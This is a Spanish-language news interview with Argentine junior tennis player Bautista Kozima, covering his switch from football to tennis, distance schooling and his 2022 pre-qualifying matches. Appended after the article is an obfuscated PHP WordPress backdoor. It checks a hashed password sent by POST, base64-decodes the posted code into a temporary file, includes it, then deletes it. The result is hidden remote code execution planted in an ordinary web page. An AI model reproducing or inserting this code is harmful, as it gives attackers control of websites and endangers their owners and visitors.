Bautista Kozima, juvenil promesa del tenis argentino: “Mi mejor año a nivel deportivo fue el 2022” 

Esta temporada, el tenista argentino Bautista Andrés Kozima experimentó una notoria mejoría en su rendimiento y alcanzó el 17º puesto en el ránking de la categoría senior (19 a 29 años). El habitante de Vicente López, de 20 años, practicó varios deportes en su niñez y adolescencia hasta que se definió por el tenis.

“Desde los cinco años que vengo haciendo actividades deportivas, impulsado por mi abuelo Mario, profesor de educación física y entrenador de esgrima, siempre me dijo que el deporte es sinónimo de salud. Practiqué equitación, taekwondo, patín, natación…, pero siempre me llamaron más el tenis y el futbol. Hice ambos deportes hasta que mis padres me pidieron que eligiera uno de los dos porque no me daban los tiempos con el colegio”, le cuenta Kozima a IAM Noticias.

“Me quedé con el tenis y desde entonces empecé a entrenar duramente todos los días. En 2018 tuve que dejar el colegio presencial para empezar a estudiar en el servicio a educación a distancia del ejercito argentino porque no me daba el tiempo para entrenar, competir y estudiar al mismo tiempo”, continúa su relato. “Desde que tomé esa decisión mi vida cambió y con quince años asumí muchas responsabilidades”, resalta.

Kozima, que estudia periodismo deportivo en su simultáneo con su carrera tenística, explica que “en 2021 llegué a mi mejor ranking en la categoría senior: undécimo. Pero mi mejor año a nivel deportivo fue este 2022, que tuve la oportunidad de jugar la pre qualy del Argentina Open, el torneo profesional más importante del país, y donde pude compartir vestuario con grandes jugadores como Juan Martin Del Potro y Diego Schwartzman, entre otros. Y también pude jugar dos pre qualys de torneos challenger. Y este año logré ubicarme entre los 200 mejores del ranking profesional nacional y jugar contra los mejores jugadores”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}